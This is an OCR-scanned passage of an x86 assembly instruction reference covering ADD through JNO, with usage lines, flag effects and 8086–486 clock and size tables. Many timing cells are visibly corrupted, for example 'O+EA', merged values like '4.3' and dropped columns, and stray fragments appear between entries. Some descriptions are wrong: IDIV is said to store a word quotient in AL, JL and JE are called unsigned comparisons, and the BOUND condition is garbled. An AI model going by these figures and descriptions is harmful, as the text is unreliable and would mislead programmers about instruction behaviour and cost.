% Operands 808x 286 386 486 Bytes 
reg, reg 3 2 2 1 2 
mem, reg 16+EA 7 7 3 2-4 (W88=24+EA) 
reg, mem O+EA 7 6 2 2-4 (W88=13+EA) 
reg, immed 4.3 2 1 3-4 
mem, immed —17+EA 7 7 3 3-6 (W88=23+EA) 
accum, immed 4 3 2 1 2-3 


- see —Instruction Timing- 
: add 


Pagina 794 di 991 


NAADD - Arithmetic Addition 


Usage: ADD dest,src 
Modifies flags: AF CF OF PF SF ZF 


Adds "src" to "dest" and replacing the original contents of "dest". 
Both operands are binary. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg 3 2 2 1 2 
mem, reg 16+EA 7 7 3 2-4 (W88=24+EA) 
reg, mem 9+EA 7 6 2 2-4 (W88=13+EA) 
reg, immed 4.3 2 1 3-4 
mem, immed —17+EA 7 7 3 3-6 (W88=23+EA) 
accum, immed 4 3 2 1 2-3 


- see —Instruction Timing- 


: and 
AAND - Logical And 


Usage: AND dest,src 
Modifies flags: CF OF PF SF ZF (AF undefined) 


Performs a logical AND of the two operands replacing the destination 
with the result. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg 3 2 2 1 2 
mem, reg 16+EA 7 7 3 2-4 (W88=24+EA) 
reg, mem O+EA 7 6 1 2-4 (W88=13+EA) 
reg, immed 4.3 2 1 3-4 
mem, immed —17+EA 7 7 3 3-6 (W88=23+EA) 
accum, immed 4 3 2 1 2-3 


- see —-Instruction Timing- 


:arpl 
AARPL - Adjusted Requested Privilege Level of Selector 
A(286+ protected mode) 


Usage: ARPL dest,src 
Modifies flags: ZF 


Compares the RPL bits of "dest" against "src". If the RPL bits 

of "dest" are less than "src", the destination RPL bits are set 
equal to the source RPL bits and the Zero Flag is set. Otherwise 
the Zero Flag is cleared. 


% Clocks size 
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% Operands 808x 286 386 486 
reg, reg - 10 20 9 
mem, reg - 11 21 9 


- see —Instruction Timing- 
: bound 
ABOUND - Array Index Bound Check (80188+) 


Usage: BOUND src,limit 
Modifies flags: None 


Array index in source register is checked against upper and lower 
bounds in memory source. The first word located at "limit" is 

the lower boundary and the word at "limit+2" is the upper array bound. 
Interrupt 5 occurs if the source value is less than or higher than 
the source. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg16, mem32 - nj=13 nj=10 7 2 
reg32, mem64 - nj=13 nj=10 7 2 
- nj = no jump taken 


- see —Instruction Timing- 


:bsf 
ABSF - Bit Scan Forward (386+ only) 


Usage: BSF. dest, src 
Modifies flags: ZF 


Scans source operand for first bit set. 


Sets ZF if a bit is found 


set and loads the destination with an index to first set bit. Clears 
ZF is no bits are found set. BSF scans forward across bit pattern 
(O-n) while BSR scans in reverse (n-0). 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg - - 10+3n 6-42 3 
reg, mem - - 10+3n 7-43 3-7 
reg32, reg32 - - 10+3n 6-42 3-7 
reg32, mem32 - - 10+3n 7-43 3-7 


:bsr 


ABSR - Bit Scan Reverse 


- see —Instruction Timing- 


(386+ only) 


Usage: BSR _dest,src 
Modifies flags: ZF 
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% 
% 


Scans source operand for first bit set. Sets ZF if a bit is found 


set and loads the destination with an index to first set bit. Clears 


ZF is no bits are found set. BSF scans forward across bit pattern 
(O-n) while BSR scans in reverse (n-0). 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg, reg - - 10+3n 6-103 3 
reg, mem - - 10+3n 7-104 3-7 
reg32, reg32 - - 10+3n 6-103 3-7 
reg32, mem32 - - 10+3n 7-104 3-7 


- see —Instruction Timing- 


:bswap 
ABSWAP - Byte Swap (486+ only) 


% 
% 


:ibt 
ABT - 


% 
% 


Usage: BSWAP reg32 
Modifies flags: none 


Changes the byte order of a 32 bit register from big endian to 
little endian or vice versa. Result left in destination register 
is undefined if the operand is a 16 bit register. 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg32 - - - 1 2 


- see -Instruction Timing- 


Bit Test (386+ only) 


Usage: BT dest, src 
Modifies flags: CF 


The destination bit indexed by the source value is copied into the 
Carry Flag. 


Clocks Size 
Operands 808x 286 386 486 Bytes 
reg16, immed8 - - 3 3 4-8 
mem16, immed8 - - 6 6 4-8 
reg16, reg16 - - 3 3 3-7 
mem16, reg16 - - 12 12 3-7 


- see —-Instruction Timing- 
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:btc 
ABTC - Bit Test with Compliment (386+ only) 


Usage: BTC. dest,src 
Modifies flags: CF 


The destination bit indexed by the source value is copied into the 
Carry Flag after being complimented (inverted). 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg16, immed8 - - 6 6 4-8 
mem16, immed8 - - 8 8 4-8 
reg16, reg16 - - 6 6 3-7 
mem16, reg16 - - 13 13 3-7 


- see —Instruction Timing- 
:btr 
ABTR - Bit Test with Reset (386+ only) 


Usage: BTR _ dest,src 
Modifies flags: CF 


The destination bit indexed by the source value is copied into the 
Carry Flag and then cleared in the destination. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg16, immed8 - - 6 6 4-8 
mem16, immed8 - - 8 8 4-8 
reg16, reg16 - - 6 6 3-7 
mem16, reg16 - - 13 13 3-7 


- see —Instruction Timing- 
:bts 
ABTS - Bit Test and Set (386+ only) 


Usage: BTS. dest,src 
Modifies flags: CF 


The destination bit indexed by the source value is copied into the 
Carry Flag and then set in the destination. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg16, immed8 - - 6 6 4-8 
mem16, immed8 - - 8 8 4-8 
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reg16, reg16 - - 6 6 
mem16, reg16 - - 13 13 


W Ww 
NN 


- see —Instruction Timing- 


:call 
NACALL - Procedure Call 


Usage: CALL destination 
Modifies flags: None 


Pushes Instruction Pointer (and Code Segment for far calls) onto 


stack and loads Instruction Pointer with the address of proc-name. 


Code continues with execution at CS:IP. 


% Clocks 

% Operands 808x 286 386 486 
rel16 (near, IP relative) 19 7 7+m 3 
rel32 (near, IP relative) - - 7+m 3 
reg16 (near, register indirect) 16 7 7+m 5 
reg32 (near, register indirect) - - 7+m 5 
mem16 (near, memory indirect) - 21+EA 11 10+m 
mem32 (near, memory indirect) - - 10+m 5 
ptr16:16 (far, full ptr supplied) 28 13 17+m 18 
ptr16:32 (far, full ptr supplied) - - 17+m 18 
ptr16:16 (far, ptr supplied, prot. mode) - 26 34+M 20 
ptr16:32 (far, ptr supplied, prot. mode) - - 34+M 20 
m16:16 (far, indirect) 37+EA 16 22+Mm 17 
m16:32 (far, indirect) - - 22+Mm 17 
m16:16 (far, indirect, prot. mode) - 29 38+m 20 
m16:32 (far, indirect, prot. mode) - - 38+m 20 
ptr16:16 (task, via TSS or task gate) - 177 TS 37+TS 
m16:16 (task, via TSS or task gate) - 180/185 5+TS 37+TS 
m16:32 (task) - - TS 37+TS 
m16:32 (task) - - 5+TS 37+TS 
ptr16:16 (gate, same privilege) - 41 52+m 35 
ptr16:32 (gate, same privilege) - - 52+m 35 
m16:16 (gate, same privilege) - 44 56+m 35 
m16:32 (gate, same privilege) - - 56+m 35 
ptr16:16 (gate, more priv, no parm) - 82 86+m 69 
ptr16:32 (gate, more priv, no parm) - - 86+m 69 
m16:16 (gate, more priv, no parm) - 83 90+m 69 
m16:32 (gate, more priv, no parm) - - 90+m 69 
ptr16:16 (gate, more priv, x parms) - 86+4x  94+4x+m 77+4x 
ptr16:32 (gate, more priv, x parms) - - 94+4x+m 77+4x 
m16:16 (gate, more priv, x parms) - 90+4x 98+4x+m 77+4x 
m16:32 (gate, more priv, x parms) - - 98+4x+m 77+4x 


- see -Instruction Timing- 


:cbw 
ACBW - Convert Byte to Word 
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Usage: CBW 
Modifies flags: None 


Converts byte in AL to word Value in AX by extending sign of AL 
throughout register AH. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 2 2 3 3 1 


- see —Instruction Timing- 
:cdq 
ACDQ - Convert Double to Quad (386+ only) 


Usage: CDQ 
Modifies flags: None 


Converts signed DWORD in EAX to a signed quad word in EDX:EAX by 
extending the high order bit of EAX throughout EDX 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none - - 2 3 1 


- see —Instruction Timing- 


:clc 
ACLC - Clear Carry 


Usage: CLC 
Modifies flags: CF 


Clears the Carry Flag. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 2 2 2 2 1 


- see —-Instruction Timing- 


:cld 
ACLD - Clear Direction Flag 


Usage: CLD 
Modifies flags: DF 
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Clears the Direction Flag causing string instructions to increment 
the SI and DI index registers. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 2 2 2 2 1 


- see —Instruction Timing- 
:cli 
ACLI - Clear Interrupt Flag (disable) 


Usage: CLI 
Modifies flags: IF 


Disables the maskable hardware interrupts by clearing the Interrupt 
flag. NMI's and software interrupts are not inhibited. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 2 2 3 5 1 


- see —Instruction Timing- 


:clts 
ACLTS - Clear Task Switched Flag (286+ privileged) 


Usage: CLTS 
Modifies flags: None 


Clears the Task Switched Flag in the Machine Status Register. This 
is a privileged operation and is generally used only by operating 
system code. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none - 2 5 7 2 


- see —Instruction Timing- 
‘cme 


ACMC - Complement Carry Flag 


Usage: CMC 
Modifies flags: CF 


Toggles (inverts) the Carry Flag 
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% Clocks Size 
% Operands 808x 286 386 486 Bytes 


none 2 2 2 2 1 


- see —Instruction Timing- 


: cmp 
ACMP - Compare 


Usage: CMP__ dest,src 
Modifies flags: AF CF OF PF SF ZF 


Subtracts source from destination and updates the flags but does 
not save result. Flags can subsequently be checked for conditions. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg 3 2 2 1 2 
mem, reg O+EA 7 5 2 2-4 (W88=13+EA) 
reg, mem O+EA 6 6 2 2-4 (W88=13+EA) 
reg, immed 4.3 2 1 3-4 
mem, immed —10+EA 6 5 2 3-6 (W88=14+EA) 
accum, immed 4 3 2 Li 2-3 


- see —Instruction Timing- 


:cmps:cmpsb:cmpsw:cmpsd 
ACMPS - Compare String (Byte, Word or Doubleword) 


Usage: CMPS dest, src 
CMPSB 
CMPSW 
CMPSD (386+ only) 
Modifies flags: AF CF OF PF SF ZF 


Subtracts destination value from source without saving results. 
Updates flags based on the subtraction and the index registers 
(E)SI and (E)DI are incremented or decremented depending on the 
state of the Direction Flag. CMPSB inc/decrements the index 
registers by 1, CMPSW inc/decrements by 2, while CMPSD increments 
or decrements by 4. The REP prefixes can be used to process 
entire data items. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
dest, src 22 8 10 8 1 (W88=30) 


- see —Instruction Timing- 


: cmpxchg 
ACMPXCHG - Compare and Exchange 


Usage: CMPXCHG dest,src (486+) 
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Modifies flags: AF CF OF PF SF ZF 


Compares the accumulator (8-32 bits) with "dest". If equal the 
"dest" is loaded with "src", otherwise the accumulator is loaded 


with "dest". 

% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg, reg - - - 6 2 
mem, reg - - - 7 2 


- add 3 clocks if the "mem,reg" comparison fails 
- see —-Instruction Timing- 


:cwd 
ACWD - Convert Word to Doubleword 


Usage: CWD 
Modifies flags: None 


Extends sign of word in register AX throughout register DX forming 
a doubleword quantity in DX:AX. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 5 2 2 3 1 


- see —Instruction Timing- 
: cwde 
ACWDE - Convert Word to Extended Doubleword (386+ only) 


Usage: CWDE 
Modifies flags: None 


Converts a signed word in AX to a signed doubleword in EAX by 
extending the sign bit of AX throughout EAX. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none - - 3 3 1 


- see —Instruction Timing- 
:daa 
ADAA - Decimal Adjust for Addition 
Usage: DAA 
Modifies flags: AF CF PF SF ZF (0F undefined) 
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Corrects result (in AL) of a previous BCD addition operation. 
Contents of AL are changed to a pair of packed decimal digits. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 4 3 4 2 1 


- see —Instruction Timing- 
‘das 
ADAS - Decimal Adjust for Subtraction 


Usage: DAS 
Modifies flags: AF CF PF SF ZF (0F undefined) 


Corrects result (in AL) of a previous BCD subtraction operation. 
Contents of AL are changed to a pair of packed decimal digits. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 4 3 4 2 1 


- see —Instruction Timing- 


‘dec 
ADEC - Decrement 


Usage: DEC dest 
Modifies flags: AF OF PF SF ZF 


Unsigned binary subtraction of one from the destination. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
reg8 3 2 2 1 2 
mem 15+EA 7 6 3 2-4 
reg16/32 3 2 2 1 1 


- see —Instruction Timing- 


:div 
ADIV - Divide 


Usage: DIV Ci de 
Modifies flags: (AF,CF,0F,PF,SF,ZF undefined) 


Unsigned binary division of accumulator by source. If the source 
divisor is a byte value then AX is divided by "src" and the quotient 
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is placed in AL and the remainder in AH. If source operand is a word 
value, then DX:AX is divided by "src" and the quotient is stored in AX 
and the remainder in DX. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg8 80-90 14 14 16 2 
reg16 144-162 22 22 24 2 
reg32 - - 38 40 2 
mem8 (86-96)+EA 17 17 16 2-4 
mem16 (150-168)+EA 25 25 24 2-4 (W88=158-176+EA) 
mem32 - - 41 40 2-4 


- see —Instruction Timing- 


‘enter 
AENTER - Make Stack Frame (80188+) 


Usage: ENTER locals, level 
Modifies flags: None 


Modifies stack for entry to procedure for high level language. 
Operand "locals" specifies the amount of storage to be allocated 

on the stack. "Level" specifies the nesting level of the routine. 
Paired with the -LEAVE- instruction, this is an efficient method of 
entry and exit to procedures. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
immed16, 0 - 11 10 14 4 
immed16,1 - 15 12 17 4 
immed16, immed8 - 12+4(n-1) 15+4(n-1) 17+3n 4 


- see —Instruction Timing- 
‘esc 


NESC - Escape 


Usage: ESC. immed,src 
Modifies flags: None 


Provides access to the data bus for other resident processors. 
The CPU treats it as a -NOP- but places memory operand on bus. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
immed, reg 2 9-20 ? 2 
immed, mem 2 9-20 ? 2-4 


- see —-Instruction Timing- 
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:ihlt 
NAHLT - Halt CPU 


Usage: HLT 
Modifies flags: None 


Halts CPU until RESET line is activated, NMI or maskable interrupt 
received. The CPU becomes dormant but retains the current CS:IP 
for later restart. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
none 2 2 5 4 1 


- see —Instruction Timing- 


:idiv 
AIDIV - Signed Integer Division 


Usage: IDIV src 
Modifies flags: (AF,CF,0F,PF,SF,ZF undefined) 


Signed binary division of accumulator by source. If source is a 
byte value, AX is divided by "src" and the quotient is stored in 
AL and the remainder in AH. If source is a word value, DX:AX is 
divided by "src", and the quotient is stored in AL and the 
remainder in DX. 


% Clocks size 
% Operands 808x 286 386 486 Bytes 
reg8 101-112 17 19 19 2 
reg16 165-184 25 27 27 2 
reg32 - - 43 43 2 
mem8 (107-118)+EA 20 22 20 2-4 
mem16 (171-190)+EA 38 30 28 2-4 (W88=175-194) 
mem32 - - 46 44 2-4 


- see —Instruction Timing- 


:imul 
AIMUL - Signed Multiply 


Usage: IMUL src 
IMUL src,immed (286+ only) 
IMUL dest,src,immed8 (286+ only) 
IMUL dest,src (386+ only) 
Modifies flags: CF OF (AF,PF,SF,ZF undefined) 


Signed multiplication of accumulator by "src" with result placed 
in the accumulator. If the source operand is a byte value, it 
is multiplied by AL and the result stored in AX. If the source 
operand is a word value it is multiplied by AX and the result is 
stored in DX:AX. Other variations of this instruction allow 
specification of source and destination registers as well as a 
third immediate factor. 
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% Clocks size 


% Operands 808x 286 386 486 Bytes 
reg8 80-98 13. 9-14 13-18 2 
reg16 128-154 21 9-22 13-26 2 
reg32 - - 9-38 12-42 2 
mem8 86-104 16 12-17 13-18 2-4 
mem16 134-160 24 12-25 13-26 2-4 
mem32 - - 12-41 13-42 2-4 
reg16, reg16 - - 9-22 13-26 3-5 
reg32, reg32 - - 9-38 13-42 3-5 
reg16, mem16 - - 12-25 13-26 3-5 
reg32, mem32 - - 12-41 13-42 3-5 
reg16, immed - 21 9-22 13-26 3 
reg32, immed - 21 9-38 13-42 3-6 
reg16, reg16, immed - 2 9-22 13-26 3-6 
reg32, reg32, immed  - 21 9-38 13-42 3-6 
reg16, mem16, immed  - 24 12-25 13-26 3-6 
reg32,mem32, immed  - 24 12-41 13-42 3-6 


- see —Instruction Timing- 


:in 
AIN - Input Byte or Word From Port 


Usage: IN accum, port 
Modifies flags: None 


A byte, word or dword is read from "port" and placed in AL, AX or 
EAX respectively. If the port number is in the range of 0-255 

it can be specified as an immediate, otherwise the port number 
must be specified in DX. Valid port ranges on the PC are 0-1024, 
though values through 65535 may be specified and recognized by 
third party vendors and PS/2's. 


% Clocks size 

% Operands 808x 286 386 486 Bytes 
accum, immed8 10/14 5 12 14 2 
accum, immed8 (PM) 6/26 8/28/27 2 
accum, DX 8/12 5 13 14 1 
accum, DX (PM) 71/271 8/28/2717 1 


- 386+ protected mode timings depend on privilege levels. 
first number is the timing if: CPL 6 IOPL 
second number is the timing if: CPL > IOPL or in VM 86 mode (386) 
CPL ò IOPL (486) 
third number is the timing when: virtual mode on 486 processor 
- 486 virtual mode always requires 27 cycles 
- see —-Instruction Timing- 
:inc 
NAINC - Increment 


Usage: INC dest 
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Modifies flags: AF OF PF SF ZF 


Adds one to destination unsigned binary operand. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
reg8 3 2 2 1 2 
reg16 3 2 2 1 1 
reg32 3 2 2 1 1 
mem 15+EA 7 6 3 2-4 (W88=23+EA) 


- see —-Instruction Timing- 


:ins:insb:insw:insd 
AINS - Input String from Port (80188+) 


Usage: INS dest,port 
INSB 
INSW 
INSD (386+ only) 
Modifies flags: None 


Loads data from port to the destination ES:(E)DI (even if a 
destination operand is supplied). (E)DI is adjusted by the size 
of the operand and increased if the Direction Flag is cleared and 
decreased if the Direction Flag is set. For INSB, INSW, INSD no 
operands are allowed and the size is determined by the mnemonic. 


% Clocks size 

% Operands 808x 286 386 486 Bytes 
dest, port - 5 15 17 1 
dest, port (PM) - 5 9/29 10/32/30 1 
none - 5 15 17 1 
none (PM) - 5 9/29 10/32/30 1 


- 386+ protected mode timings depend on privilege levels. 


first number is the timing if: CPL 6 IOPL 
second number is the timing if: CPL > IOPL 
third number is the timing if: virtual mode on 486 processor 


- see -Instruction Timing- 


sint 
NINT - Interrupt 


Usage: INT num 
Modifies flags: TF IF 


Initiates a software interrupt by pushing the flags, clearing the 
Trap and Interrupt Flags, pushing Cs followed by IP and loading 
CS:IP with the value found in the interrupt vector table. Execution 
then begins at the location addressed by the new CS:IP 
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% Clocks size 


% Operands 808x 286 386 486 Bytes 
3 (constant) 52/72 23+m 33 26 2 
3 (prot. mode, same priv.) - 40+m 59 44. 2 
3 (prot. mode, more priv.) - 78+m 99 71. 2 
3 (from VM86 to PL 0) - - 119 822 
3 (prot. mode via task gate) - 167+m TS 37+TS 2 
immed8 51/71 234m 37 30 sl 
immed8 (prot. mode, same priv.) - 40+m 59 44 1 
immed8 (prot. mode, more priv.) - 78+m 99 71 1 
immed8 (from VM86 to PL 0) - - 119 86 1 
immed8 (prot. mode, via task gate) - 167+m TS 37+TS 1 


- see —Instruction Timing- 
:into 
AINTO - Interrupt on Overflow 


Usage: INTO 
Modifies flags: IF TF 


If the Overflow Flag is set this instruction generates an INT 4 
which causes the code addressed by 0000:0010 to be executed. 


% Clocks Size 

% Operands 808x 286 386 486 Bytes 
none: jump 53/73 24+Mm 35 28 1 

no jump 4 3 3 3 

(prot. mode, same priv.) - - 59 46 1 
(prot. mode, more priv.) - - 99 73 1 
(from VM86 to PL 0) - - 119 84 1 
(prot. mode, via task gate) - TS 39+TS 1 


- see —Instruction Timing- 
:invd 
AINVD - Invalidate Cache (486+ only) 


Usage: INVD 
Modifies flags: none 


Flushes CPU internal cache. Issues special function bus cycle 
which indicates to flush external caches. Data in write-back 
external caches is lost. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 


none - - - 4 2 


- see —Instruction Timing- 
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:invlpg 


AINVLPG - Invalidate Translation Look-Aside Buffer Entry 


Usage: 


INVLPG 


Modifies flags: none 


(486+ only) 


Invalidates a single page table entry in the Translation 
Intel warns that this instruction may be 
implemented differently on future processors. 


Look-Aside Buffer. 


% 


% Operands 808x 


none a 


Clocks 
286 386 


Si 
486 


12 


- timing is for TLB entry hit only. 
- see —Instruction Timing- 


:iret:iretd 
AIRET/IRETD - Interrupt 

Usage: IRET 
IRETD 


Return 


(386+ only) 


ze 


Modifies flags: AF CF DF IF PF SF TF ZF 


Bytes 


2 


Returns control to point of interruption by popping IP, CS 

and then the Flags from the stack and continues execution at 

CPU exception interrupts will return to the 
instruction that cause the exception because the CS:IP placed 

on the stack during the interrupt is the address of the offending 


this location. 


instruction. 
% Clocks Size 
% Operands 808x 286 386 486 Bytes 
iret 32/44 17+m 22 15 1 
iret (prot. mode) - 31+M 38 15 1 
iret (to less privilege) - 55+m 82 36 1 
iret (different task, NT=1) - 169+m TS TS+32 1 
iretd - - 22/38 15 1 
iretd (to less privilege) - - 82 36 1 
iretd (to VM86 mode) - - 60 15 1 
iretd (different task, NT=1) - - TS TS+32 1 


- 386 timings are listed as real-mode/protected-mode 


- see —Instruction Timing- 
ora 
AJump Instructions Table 
% Mnemonic Meaning 
-JA- Jump if Above 
-JAE- Jump if Above or Equal 
-JB- Jump if Below 
-JBE- Jump if Below or Equal 
-JC- Jump if Carry 
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Jump Condition 


CF=0 and ZF=0 

CF=0 
CF=1 

CF=1 or ZF=1 
CF=1 


-JICXZ- Jump if CX Zero CX=0 
-JE- Jump if Equal ZF=1 
-JG- Jump if Greater (signed) ZF=0 and SF=0F 
-JGE- Jump if Greater or Equal (signed) SF=0F 
-JL- Jump if Less (signed) SF != OF 
-JLE- Jump if Less or Equal (signed) ZF=1 or SF != OF 
—JMP- Unconditional Jump unconditional 
-JNA- Jump if Not Above CF=1 or ZF=1 
-JNAE- Jump if Not Above or Equal CF=1 
-JNB- Jump if Not Below CF=0 
-JNBE- Jump if Not Below or Equal CF=0 and ZF=0 
-JNC- Jump if Not Carry CF=0 
-JNE- Jump if Not Equal ZF=0 
-JNG- Jump if Not Greater (signed) ZF=1 or SF != OF 
-JNGE- Jump if Not Greater or Equal (signed) SF != OF 
-JINL- Jump if Not Less (signed) SF=0F 
-JNLE- Jump if Not Less or Equal (signed) ZF=0 and SF=0F 
-JNO- Jump if Not Overflow (signed) OF=0 
-JNP- Jump if No Parity PF=0 
-JINS- Jump if Not Signed (signed) SF=0 
-JINZ- Jump if Not Zero ZF=0 
-JO- Jump if Overflow (signed) OF=1 
-JP- Jump if Parity PF=1 
-JPE- Jump if Parity Even PF=1 
-JPO- Jump if Parity Odd PF=0 
-JS- Jump if Signed (signed) SF=1 
-JZ- Jump if Zero ZF=1 

% Clocks Size 

% Operands 808x 286 386 486 Bytes 

Jx: jump 16 7+m 7+m 3 2 
no jump 43 3 1 
Jx near-label - - 7+m 3 4 
no jump - - 3 1 


- It's a good programming practice to organize code so the 
expected case is executed without a jump since the actual 
jump takes longer to execute than falling through the test. 

- see -JCXZ- and -JMP- for their respective timings 

- see -Instruction Timing- —FLAGS- 


:ja:jnbe 
AJA/JNBE - Jump Above / Jump Not Below or Equal 


JA 
JNBE label 
Modifies flags: None 


Usage: label 


Causes execution to branch to "label" if the Carry Flag and Zero Flag 
are both clear. Unsigned comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 
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- see —-Instruction Timing- 
:jae:jnb 
AJAE/JNB - Jump Above or Equal / Jump on Not Below 


Usage: JAE label 
JNB label 
Modifies flags: None 


Causes execution to branch to "label" if the Carry Flag is clear. 


Functionally similar to -JNC-. Unsigned comparision. 
% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see —Instruction Timing- 
:jb:jnae 
AJB/JNAE - Jump Below / Jump Not Above or Equal 


Usage: JB label 
JNAE label 
Modifies flags: None 


Causes execution to branch to "label" if the Carry Flag is set. 


Functionally similar to -JC-. Unsigned comparision. 
% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 4.3 3 1 


- see —Instruction Timing- 
:jbe:jna 
AJBE/JNA - Jump Below or Equal / Jump Not Above 


Usage: JBE label 
JNA label 
Modifies flags: None 


Causes execution to branch to "label" if the Carry Flag or 


the Zero Flag is set. Unsigned comparision. 

% Clocks Size 

% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
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no jump 43 3 1 
- see —Instruction Timing- 
:jc 


AJC - Jump on Carry 


Usage: IC label 
Modifies flags: None 


Causes execution to branch to "label" if the Carry Flag is set. 


Functionally similar to -JB- and -JNAE-. Unsigned comparision. 
% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see —Instruction Timing- 


:jcxz:jecxz 
AICXZ/JECXZ - Jump if Register (E)CX is Zero 


Usage: JICXZ label 
JECXZ label (386+ only) 
Modifies flags: None 


Causes execution to branch to "label" if register CX is zero. Uses 
unsigned comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 18 8+m 9+m 8 2 
no jump 6 4 5 5 


- see -Instruction Timing- 


:je:jz 
AJE/JZ - Jump Equal / Jump Zero 


Usage: JE label 
JZ label 
Modifies flags: None 


Causes execution to branch to "label" if the Zero Flag is set. Uses 
unsigned comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
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no jump 43 3 1 


- see -Instruction Timing- 


:jg:jnle 
AJG/JNLE - Jump Greater / Jump Not Less or Equal 


Usage: JG label 
JNLE label 
Modifies flags: None 


Causes execution to branch to "label" if the Zero Flag is clear or 
the Sign Flag equals the Overflow Flag. Signed comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see —Instruction Timing- 


:jge:jn1 
AJGE/JINL - Jump Greater or Equal / Jump Not Less 


Usage: JGE label 
JNL label 
Modifies flags: None 


Causes execution to branch to "label" if the Sign Flag equals 
the Overflow Flag. Signed comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see —Instruction Timing- 
:jl:jnge 
AJL/JNGE - Jump Less / Jump Not Greater or Equal 


Usage: IL label 
JNGE label 
Modifies flags: None 


Causes execution to branch to "label" if the Sign Flag is not equal 
to Overflow Flag. Unsigned comparision. 


% Clocks size 
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% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 
- see —Instruction Timing- 
:jle:jng 


AJLE/JING - Jump Less or Equal / Jump Not Greater 


Usage: JLE label 
JNG label 
Modifies flags: None 


Causes execution to branch to "label" if the Zero Flag is set or the 
Sign Flag is not equal to the Overflow Flag. Signed comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see —Instruction Timing- 


:jmp 
AJMP - Unconditional Jump 


Usage: JMP target 
Modifies flags: None 


Unconditionally transfers control to "label". Jumps by default 

are within -32768 to 32767 bytes from the instruction following 

the jump. NEAR and SHORT jumps cause the IP to be updated while FAR 
jumps cause CS and IP to be updated. 


% Clocks 

% Operands 808x 286 386 486 
rel8 (relative) 15 7+m 7+m 3 
rel16 (relative) 15 7+m 7+m 3 
rel32 (relative) - - 7+m 3 
reg16 (near, register indirect) 11 7+m 7+m 5 
reg32 (near, register indirect) - - 7+m 5 
mem16 (near, mem indirect) 18+EA 11+m 10+m 5 
mem32 (near, mem indirect) 24+EA 15+m 10+m 5 
ptr16:16 (far, dword immed) - - 12+m 17 
ptr16:16 (far, PM dword immed) - - 27+m 19 
ptr16:16 (call gate, same priv.) - 38+m 45+m 32 
ptr16:16 (via TSS) - 175+m TS 42+TS 
ptr16:16 (via task gate) - 180+m TS 43+TS 
mem16:16 (far, indirect) - - 43+m 13 
mem16:16 (far, PM indirect) - - 31+M 18 
mem16:16 (call gate, same priv.) - 41+m 49+m 31 
mem16:16 (via TSS) - 178+m 5+TS 41+TS 
mem16:16 (via task gate) - 183+m 5+TS 42+TS 
ptr16:32 (far, 6 byte immed) - - 12+m 13 
ptr16:32 (far, PM 6 byte immed) - - 27+m 18 
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ptr16:32 (call gate, same priv.) - - 45+m 31 
ptr16:32 (via TSS) - - TS 42+TS 
ptr16:32 (via task state) - - TS 43+TS 
m16:32 (far, address at dword) - - 43+m 13 
m16:32 (far, address at dword) - - 31+Mm 18 
m16:32 (call gate, same priv.) - - 49+m 31 
m16:32 (via TSS) - - 5+TS 41+TS 

m16:32 (via task state) - - 5+TS 42+TS 


- see —Instruction Timing- 


:jnc 
AJINC - Jump Not Carry 


Usage: JINC label 
Modifies flags: None 


Causes execution to branch to "label" if the Carry Flag is clear. 


Functionally similar to -JAE- or -JNB-. Unsigned comparision. 
% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see —Instruction Timing- 


:jne:jnz 
AJINE/JINZ - Jump Not Equal / Jump Not Zero 


Usage: JNE label 
JNZ label 
Modifies flags: None 


Causes execution to branch to "label" if the Zero Flag is clear. 
Unsigned comparision. 


% Clocks Size 
% Operands 808x 286 386 486 Bytes 
label: jump 16 7+m 7+m 3 2-4 
no jump 43 3 1 


- see —Instruction Timing- 
:jno 


AJNO - Jump Not Overflow 


Usage: JNO label 
Modifies flags: None 


Causes execution to branch to "label" if the Overflow Flag is clear. 
